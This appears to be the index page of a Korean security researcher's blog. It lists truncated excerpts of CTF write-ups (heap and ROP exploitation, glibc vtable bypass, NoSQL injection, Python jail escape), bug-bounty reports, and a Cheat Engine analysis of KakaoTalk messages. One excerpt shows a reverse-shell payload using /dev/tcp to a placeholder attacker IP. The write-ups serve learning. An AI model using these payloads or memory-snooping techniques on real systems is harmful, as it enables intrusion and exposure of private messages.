Universe blog

`Frida Install` Frida를 설치하기 위해 아래 명령어를 입력해 준다. pip3 install frida pip3 install frida-tools `Frida, Hello world` Frida 설치가 끝나면, Frida를 이용해서 Hello world를 출력해보자. Hello world를 출력하는 방법은 여러가지 방법이 있다. `첫번째` 방법은, 작업 폴더에 notepad.js 파일을 생성한 뒤, 아래 코드를 작성해준다. frida를 실행하기 위해서 타겟 프로그램을 실행해야 한다. 필자는 notepad..

한글 2020 프로그램을 기준으로, 문서에 비밀번호를 설정하면 문서가 암호화 된다. 이러한 과정을 IDA와 Cheat Engine을 이용해서 분석해 보겠다. 한글 2020 문서 분석 1. 암호화가 되어 있지 않은 문서 간단한 한글문서(no_pw.hwp)를 만들어 반디집으로 한글문서를 열어보면 아래처럼 보일 것이다. `PrvText`: 사용자가 작성한 내용의 미리보기 값이 들어있다. `Prvimage`: 이미지 썸네일로 추측된다. `FileHeader`: 이 파일..

Cheat Engine으로 kakao talk의 메시지를 분석해 보겠다. 단, 분석하는 과정에서 데이터의 크기를 변조하거나, 악의적인 목적으로 이용될 경우 정지 당하게 되므로 조심하자. `Cheat Engine에서 kakao talk을 attach 하기` cheat Engine과 kakao talk을 실행한다. 그 후, Cheat Engine에서 kakao talk을 attach 한다. 위 사진에서 kakao talk을 선택하고 open을 누르면 attach에 성공한 것이다. `Cheat Engine으로 kakao talk..

[WEB - "Hermit - Part 1"] 위 문제 링크에 접속하면 이미지를 업로드 하는 페이지가 나온다. 아래 사진 처럼 이미지를 업로드 하면 png의 hex값과 함께 이미지가 출력된다. 업로드할 이미지 맨 마지막에 간단한 php 코드를 작성한뒤 업로드 하면 php 코드가 동작하는 것을 볼 수 있다. 이를 이용하여 reverse shell 공격을 시도 했다. payload는 다음과 같다. & /dev/tcp/'Your IP'/'Y..

WEB / finger-warmup 문제 사이트에 접속하면 아래 사진 처럼 클릭하는 링크가 나온다. 클릭하면 똑같은 페이지 이지만, 주소 뒤에 랜덤한 값이 따라 붙는다. 문제 힌트에 `requests` 모듈과 `beautifulsoup` 모듈을 사용하라고 되어 있어, `a` 태그를 크롤링해 계속 클릭하면 flag를 획득 할 수 있을 거라고 생각했다. import requests import bs4 import time url = "https://finger-warmup.chals.damctf.xyz/" s = request..

There is no Spoon keyword: `Heap overflow` #include #include #include #include char * xor(char * src, char * dest, int len) { for(int i = 0; i < len - 1; i++) { dest[i] = src[i] ^ dest[i]; } dest[len-1] = 0; return dest; } int main() { setvbuf(stdout, 0, 2, 0); setvbuf(stderr, 0, 2, 0); char buffer[256]; int len = 256; printf("Neo, enter your matrix: "); len = read(0, buffer, len); char * buff..

`glib 2.24` 이상 버전 부터 `_IO_validate_vtable()` 로 `vtable`을 검사한다. 이 때문에 `vtable` 값을 공격자가 원하는 함수의 주소로 overwrite 할 수가 없다. 하지만 `glibc 2.27` 버전까지 이를 bypass 할 수 있는 방법이 있는데, `_IO_str_overflow()` 함수와 `_IO_str_finish()` 함수를 이용한 bypass 공격 방법이 있다. 아래 설명하는 내용은 `glibc 2.29` 버전에 패치 되었다. _IO_validate_vtable() 이 함수는 `glibc..

_IO_FILE 리눅스 시스템의 표준 라이브러리에서 파일 스트림을 나타내기 위한 구조체입니다. 이 구조체는 `fopen()`, `fwrite()`, `fclose()` 등 파일 스트림을 사용하는 함수가 호출되었을때 할당 됩니다. `_IO_FILE`의 구조체는 다음과 같습니다. struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ /* The following pointers correspond to the C++ streambuf protocol. */ char *_IO_read_..

pwnable 분야의 validator 문제이다. 해당 문제는 바이너리만 주워줬고, 바이너리 파일을 c 나타내면 다음과 같다. void validate(void *input_data, int arg2){ for (int i = 0; i <= 9; i = i + 1){ if (input_data[i] != correct[i]) exit(0); } int var_c = 0xb; while (true){ if (arg2 <= var_c) return 0; if (input_data[var_c] != (input_data[var_c + 1] + 1)) break; var_c = var_c + 1; } exit(0); } int main(){ v..

web 분야의 Mango 문제이다. 해당 문제는 코드가 주워줬고, `mongodb injection` 으로 admin 의 pw를 알아내는 문제이다. const express = require('express'); const app = express(); const mongoose = require('mongoose'); mongoose.connect('mongodb://localhost/main', { useNewUrlParser: true, useUnifiedTopology: true }); const db = mongoose.connection; // flag is in db, {'uid': 'admin', 'upw': 'DH{32alphanu..

1. Source php의 `auto type casting` 문제 인거 같다. SOURCE 10000){ echo (' Correct darkCTF{} '); } else { echo (' Wrong! Ohhhhh!!! Very Close '); } } else { echo (' Wrong! Nice!!! Near But Far '); } } else { echo (' Wrong! Ahhhhh!!! Try Not Easy '); } ?> 위 코드를 보면 `$_SERVER['HTTP_USER_AGENT']..

pwnable 분야의 두번째 문제 newPaX 이다. Checksec Analyze 이번 바이너리에는 `main()` 과 `vuln()` 이렇게 2개가 있는데, `main()` 함수에는 별거 없고 `vuln()` 함수에서 `BOF` 공격이 가능하다. 이전 문제와 다른점은 `32bit` 라는 점이다. `32bit rop` 공격은 `64bit` 와 다르기 때문에, 아래 코드 처럼 `stack` 에 데이터를 overwrite 했다. 필자는 `read()` 함수의 `GOT`를 leak 했고, libc database 사이트에서 라이..

pwnable 분야의 첫번째 문제 roprop 이다. (write up을 작성하는 시점에서 서버가 닫혀있어 설명하는데 지장이...) Checksec ubuntu:~/environment/ctf/DarkCTF/pwn/01_rop $ checksec roprop [*] '/home/ubuntu/environment/ctf/DarkCTF/pwn/01_rop/roprop' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) Analyze 바이러니는 `main` 함수만 정의 되어 있다. `get..

어떤 CTF에서 python flask 관련 문제가 나왔는데, flask의 debugger pin을 Leak해서 exploit 하는 문제 였다. flask debugger pin은 뭐길래 exploit이 가능한지 알아보자. What is Flask debugger PIN debugger PIN은 개발환경에서 에러가 났을때 쉽게 대화형 debug 모드로 접근 가능하다. 이때 접근 하기 위해서는 PIN 코드가 필요한데 이것이 debugger PIN이다. 코드로 예를 들어 보겠다. 아래 코드에서 마지막 줄을 보면 `d..

google ctf web 문제의 log me in 이다. 해당 문제 write up은 다른 사람의 롸업을 보고 작성한 것이다. 문제 페이지에 접속하면 아래와 같은 페이지가 나온다. 이번 문제는 코드를 올려 줬는데, 문제의 코드는 아래와 같다. /** * @fileoverview Description of this file. */ const mysql = require('mysql'); const express = require('express'); const cookieSession = require('cookie-session'); const cookieParser =..

Google CTF 2020 문제중 web 문제 `pasteurize` 이다. 해당 write up은 외국인의 풀이를 바탕으로 작성되었다. 문제 사이트에 접속하면 입력과 제출을 할 수 있는 기능이 있다. 개발자 모드로 보면 `/source` 링크가 있는데 해당 링크로 들어가면 `nodejs`로 코딩된 코드를 볼 수 있다. 아래는 문제의 코드이다. const express = require('express'); const bodyParser = require('body-parser'); const utils = require('./u..

Title Internal Ports Scanning and IPs Scanning via SSRF Weakness SSRF 이번에 제보한 보고서는 SSRF 취약점 이다. SSRF 공격으로 내부 IP 또는 Port를 스캔 할 수 있다. 해당 사이트는 이미지를 업로드 하거나, 이미지 URL를 입력하여 서버가 그 이미지를 가져오는 기능이 있다. 혹시나 하는 마음에 http://127.0.0.1 라고 입력했는데 아래와 같은 결과가 출력 되었다. [127.0.0.1]: Image could not be downloaded..

Analytic 이번 문제는 `main()` 함수와 `win()` 함수 2개만 있다. `main()` 함수를 보면 사용자가 입력한 값을 write 하는 것만 있다. int main(){ setup() puts("Door To Other RealmS") int32_t var_14 = 0 int32_t var_10 = 0 *door = rand():0.d while (true) print_menu() uint64_t rax_2 = zx.q(read_int32():0.d) if (rax_2:0.d != 2) if (rax_2:0.d s> 2) if (rax_2:0.d != 3) if (rax_2:0.d == 4) return 0 // rax_2..

Analytic checksec으로 검사 해보니 처음보는 것이 있는데 `fortify: enabled` 이다. 이건 처음봐서 뭔지 모르겠다... 문제 푸는데는 지장 없는듯..? `create_child()` 함수를 보면 18세 이하만 조건을 통과 할 수 있는데, 조건을 통과하면 `child`의 구조체가 만들어진다. void create_child(){ __printf_chk(1, "Age: ") int64_t rax_1 = read_int32() uint64_t rax_7 if (rax_1:0.d u> 0x12) rax_7 = puts("Not a child.")..

Nickname Universe About me `Bug Bounty` KVE-2020-1698 NBB-1810 (Naver Bug Bounty SPECIAL CONTRIBUTORS) KVE-2021-0637 KVE-2021-0735 KVE-2021-0741 KVE-2021-0742 KVE-2021-0754 University CERT ㅁㅁㅁ 웹사이트 취약점 점검 `Activity` 사이버작전사령부 정보보호병 (2019.06 ~ 2020.11) 정보보호동아리 Casper 회장 (2021.03 ~) BoB 10th 취약점 분석 트랙 (2021.07 ~) null2root 준회원 (2021.07 ~) `Award` 제 5회..

Analytic `Full RELRO` 이기 때문에 GOT overwrite를 할 수 없다. `buy()` 함수를 보면 사용자가 선택한 자동차가 메모리 공간에 저장된다. 이때의 메모리 구조를 보면 아래와 같다. `0x603260` ~ `0x6032af`: 사용자가 `buy()` 함수를 호출하면 `car`라는 구조체의 chunk가 만들어짐 `0x603260`: 자동차 이름을 저장한 주소 `0x603268`: 자동차 이름의 크기 `0x603270`: 다음 청크(`car`)의 주소 `0x603278`: 이전 청크(`car..

Analytic 아래 사진은 사용자 정의 함수 목록이다. fill_letters(), fill_numbers(), fill_handles(), fill_words() 함수들은 특별한 기능은 없고 사용자 선택에 따라 문장을 만들어 출력하는 함수 이다. 하지만 fill_handles() 함수를 제외한 나머지 함수들은 만들어진 문장으로 초기화 하여 생성하지만, fill_handles() 함수는 로직 에러로 초기화를 하지 않고 문장을 추가한다. 코드로 자세히 설명하자면, 사용자가 select1..

바이너리 파일을 분석하여 c로 나타내면 아래와 같다. void make_note(){ printf("size: "); int size = read_int(); void* addr = malloc(0x38); *(addr + 0x30) = malloc(size); *(addr + 0x8) = size; *addr = &get_size(); printf("Title: "); readline(addr + 0xc, 0x1f, 0xa); printf("Note: ") readline(*(addr + 0x30), size, 0xa); *data_602300 = addr; } void edit_note(){ int addr = *data_602300; if(addr != 0)..

이번 문제는 UAF 관련 문제이다. 해당 바이너리에는 아래와 같은 보안 장치가 설정되어 있다. 바이너리를 c코드로 변환하면 아래와 같다. void hash_gift(arg1, arg2){ int result1 = 0; int result2 = 0; int count = 0; while(true){ if(count >= int(arg2/2)) break; result1 = result1 + *(arg1 + count); count++; } for(int i = int(arg2)/2; i > 0x2; eax = eax >> 0x1f; edx = edx - eax; eax = edx; eax = eax << 0x2..

해당 바이너리에는 아래와 같은 보안 기법이 적용되어 있다. 또한 아래 사진처럼 여러개의 사용자 정의 함수들의 존재하는 것을 볼 수 있다. 사용자 정의 함수들 중 아래 make_note() 함수를 보자. 기본적으로 0x28 만큼 공간을 할당하고, 사용자로 부터 크기를 입력받아 공간을 할당한다. 만약 *(addr + 0x20) 에 값이 들어가 있으면 공간을 할당 하지 않는다. void make_note(){ if(count <= 0x20){ printf("size of note:..

MISC 분야의 문제이다. nc로 접속하면 아래와 같이 문제가 출력이 된다. 문제만 봐도 한눈에 이해가 간다. python으로 4자리를 찾는 코드를 작성하면 아래와 같다. string 패키지로 문자열을 나열한 다음 for문 4개를 이용해 알맞은 4자리 값을 찾은 후 sendline() 함수로 값을 보낸다. from pwn import * import string import hashlib context.log_level = "debug" p = remote("34.74.30.191", "1337") line = p.recvline()..

몇일간 이 문제 푼다고 고민하고 롸업 보면서 내걸로 만들려고 했지만.. 어려웠다. 덕분에 새로운 접근법을 알게 되었다. Attack tech FSP Buffer Overflow GOT Overwrite ROP Return to csu Analyze 이 문제는 총 2개의 함수가 존재하는데, main() readn() 이렇게 2개가 존재한다. main() 함수에서 readn() 함수로 입력을 받고, scanf() 함수로 한번더 입력을 받는데 여기서 FSB 공격이 가능하다. 또한 buffer overflow도 can..

Weakness Information Exposure Through an Error Message Summary hackerone 에서 bug bounty를 하고 있었다. 어떤 사이트를 대상으로 공격을 했는지는 말 할 수는 없지만, 나의 첫 버그 바운티 보고는 에러를 이용한 서버 정보 노출이었다. 타킷 사이트의 파라미터는 아래와 같다. cartCode=00000652597083&CSRFToken=4ffccfb9-76fc-48aa-9625-a93a2ff31bb4 필자는 SQLI 공격을 하려고 시도 했지만 WAF에 차단되었다. cartCod..

python jail 문제이다. nc로 접속하면 아래와 같이 python 코드가 출력이 되고 사용자에게 입력을 받는다. 입력받은 문자열은 필터링을 거치고 exec() 함수로 실행이 된다. python3 버전 이므로 __builtins__ 모듈을 사용하여 내장 객체를 이용할 수 있다. 아래와 같이 dir() 함수로 __builtins__ 모듈에 포함되어 있는 메소드를 볼 수 있다. __dict__ 를 사용하여 dictionary 타입으로 출력 할 수 있다. dictionary 타입으..

pwnable.xyz 34번째 문제 dirty turtle 이다. Analyze 이번 문제의 사용자 정의 함수를 보면 아래와 같다. ubuntu:~/environment/ctf/pwnable.xyz/34_Dirty turtle $ func challenge __libc_csu_fini __libc_csu_init _fini _init _start get_val handler main setup win checksec으로 바이너리에 적용된 보안 기법을 보면 아래와 같다. ubuntu:~/environment/ctf/pwnable.xyz/34_Dirty turtle $ checksec --file=challenge REL..